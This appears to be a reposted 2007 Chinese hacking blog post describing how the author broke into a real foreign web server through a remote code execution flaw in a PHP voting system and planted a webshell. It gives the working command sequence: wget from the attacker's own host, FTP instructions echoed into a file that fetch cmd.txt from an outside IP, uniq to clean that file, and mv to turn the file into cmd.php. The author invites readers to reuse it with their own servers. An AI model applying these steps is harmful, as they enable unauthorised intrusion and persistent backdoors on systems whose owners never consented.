Lycou' Blog

Lycou' Blog

IT博客 首页 新随笔 联系 聚合 管理
  0 Posts :: 15 Stories :: 0 Comments :: 0 Trackbacks
linux+apache+php的一次拿webshell的心得
作者:stealthwalker  来源:邪恶八进制信息安全团队  发布时间:2007-2-1 0:45:26  发布人:黑客动画吧

减小字体 增大字体

首先俺先声明俺是个菜鸟,俺虽然是菜鸟但俺不会一直是菜鸟的(一旁兄弟喊到:别俺,俺,俺的,说普通话!)。俺,不对,我一直遵照着实践是检验真理的唯一标准这句话学习技术,这不,刚刚实践了一次有了一点小小的心得,拿出来和大家分享一下:)
简单介绍一下背景吧(旁白:我kao,你写小说呢?),我一直想拿一个TK国的肉鸡(没有仇啊,只是从来没拿过,想要!),于是google了一个,然后一阵狂扫(哎,固有思路的错)废了半天劲,结果是没戏!正准备走的时候发现了它用的一个投票系统,于是满大街找终于找到了下载地址。dwon下来后,开始阅读代码(当时很激动,第一次尝试漏洞发掘!),结果居然被我找到了一个远程代码执行的漏洞,乎乎,赶紧试了一下,成功!看样子,我要发财了。于是看了看safe_mode=OFF,嘿嘿~~可以执行shell命令。下面的思路很显然了,就是拿webshell。原来在win中碰到mssql可以执行命令的情况最简单的办法就是用echo写入一句话后门,于是赶紧找来php的一句话后门,结果一看傻了眼。linux shell中">","<","$",";"等等这些字符都是有特殊含义的。而linux下转义特殊字符的方法有两种:
1。使用单引号将要转义的字符包含起来
2。在需要转义的字符前加上“\”符号。

正要兴冲冲地修改一句话后门,才想起来还没看看目标机器的magic_quotes_gpc是怎么设置的。一想到这心里凉了一大节,一般都是ON的啊。实践检验真理,果然被我言中了。因为它一ON,所有的单引号,还有空字符,以及“\”等字符前面又被加上了一个“\”。我的一句后门被改的面目全非还执行个P啊:-(

一条路断了,接着找另一条。想到wget下载的方法,这个以前看过很多前辈用过,于是先看看wget存不存在,如图(图中我是为了方便,自己写的一个exp。):

=800) window.open('/Article/UploadPic/2007-2/2007210454786.jpg');" src="/Article/UploadPic/2007-2/2007210454786.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0>
看样子是存在的。于是把一个执行cmd功能的php文件cmd.php改成cmd.txt上传到自己的web空间(记得要改后缀啊,因为直接请求一个php文件返回的结果是解析过的,肯定不对的了!),在exp环境中输入wget http://www.myhost.com/cmd.txt。结果等了半天却是失败了(后来我又
google了几个有漏洞的站,只有一个使用wget下载成功的。其它的都失败了!:-()
一条路又没了,哎~~~接着想吧!突然想起来原来在win下使用ftp命令上传webshell的方法,于是回忆了一下过程:
1。使用echo命令把ftp指令echo到一个文本文件里
2。使用 ftp的-s选项制订这个文本文件,这样下载的整个过程都不需要人工干预了。

好,说干就干!需要echo的内容如下:
echo open 111.111.111.111 >temp.txt
echo username >>temp.txt
echo passwd >>temp.txt
echo get cmd.txt >>temp.txt
echo bye >>temp.txt

上面的ip和用户名和密码都是假的,你问我为什么?(我kao,我怕哪为大哥把我的ftp给做了:-)实际用的时候换成你自己的就行了,好,开始在exp环境下echo,一会的功夫就echo完了。确保正确我们在cat一下看看吧:cat ./temp.txt,这一cat不要紧,我又惊了一次!里面的每一行都被重复了一次,如图(这个是我事后为了写这个文章重新做的,所以忘了在最前面echo open 111.111.111.111了,大家知道就行!:-)

=800) window.open('http://forum.eviloctal.com/attachment/Mon_0701/10_72248_1be50d4c79fba15.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0701/10_72248_1be50d4c79fba15.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0>
面对这个问题,再次我让我想到在win+mssql情况下也碰到这样的问题,原因是由于对数据库多次查询造成的结果。当时的解决办法有很多,常用的有:
1。如果写入的是一句话后门可以直接echo进去,使用“>”而不是“>>”。
2。写入hget.vbs,用来下载指定的文件。这个时候可以才用“:”符号把各行代码连接起来,一次性写入。
3。或者是用echo把每行代码都echo到一个不同的文件,然后再用copy命令把这些文件的内容连接起来生成新的文件。

还有其它的方法我就不多说了,但很明显,这些方法用在我这里是肯定不行的了!因为我查了一下,cp命令好像不支持“+”连接符。难道没办法了吗?NO!方法是人想出来的,于是乎我查来查去还真让我找到了一个宝贝:uniq命令,这个是linux shell下的自带程序,功能很单一,但恰恰是我们需要的——去除重复行。我再kao一次,thank god!命令帮助如下:
QUOTE:

$ uniq --help
Usage: uniq [OPTION]... [INPUT [OUTPUT]]
Discard all but one of successive identical lines from INPUT (or
standard input), writing to OUTPUT (or standard output).

Mandatory arguments to long options are mandatory for short options too.
-c, --count       prefix lines by the number of occurrences
-d, --repeated     only print duplicate lines
-D, --all-repeated[=delimit-method] print all duplicate lines
                delimit-method={none(default),prepend,separate}
                Delimiting is done with blank lines.
-f, --skip-fields=N   avoid comparing the first N fields
-i, --ignore-case   ignore differences in case when comparing
-s, --skip-chars=N   avoid comparing the first N characters
-u, --unique       only print unique lines
-w, --check-chars=N   compare no more than N characters in lines
    --help   display this help and exit
    --version output version information and exit

A field is a run of whitespace, then non-whitespace characters.
Fields are skipped before chars.

Report bugs to <bug-coreutils@gnu.org>.


常搞黑的应该能认出大多数单词了,我就不多做介绍了。反正用在我这里,就这么简单一句命令就可以搞定:uniq temp.txt >down.txt,如图:

=800) window.open('http://forum.eviloctal.com/attachment/Mon_0701/10_72248_9188d83bdf39436.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0701/10_72248_9188d83bdf39436.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0>
哈哈,成了吧?下面用法就很简单了,在exp的提示符下输入ftp <down.txt,然后稍等一会,在ls看一下,哇塞!我kao,我的宝贝已经乖乖的等我了(我嫌麻烦就不抓图了,保证好用,童叟无欺!)。
下面的工作就好办了,使用mv改个名字就行了:mv ./cmd.txt ./cmd.php

到这里就结束了,我原来在交流版块发过一个求助的帖子,除了几个兄弟回帖外便没有什么价值的东西了。我也是菜鸟,和大多数菜鸟都有一个很不好的习惯:不懂就问。哎~~~其实有些东西不是咱们比老鸟差,而是我们太懒太不知道总结了,所以我们应该是不懂就学,而不是不懂就问!这样,我们才会从菜鸟变成老鸟,才能进步!

上面乃是自己的经验总结,看上去很简单,可是却耗费了我不少精力,所以如果您不喜欢请不要打击我,回个帖鼓励鼓励我,我会很感激的。谢谢!
posted on 2007-02-01 15:54 Lycou' Blog 阅读(335) 评论(0)  编辑 收藏 引用 所属分类: 技术无底
只有注册用户登录后才能发表评论。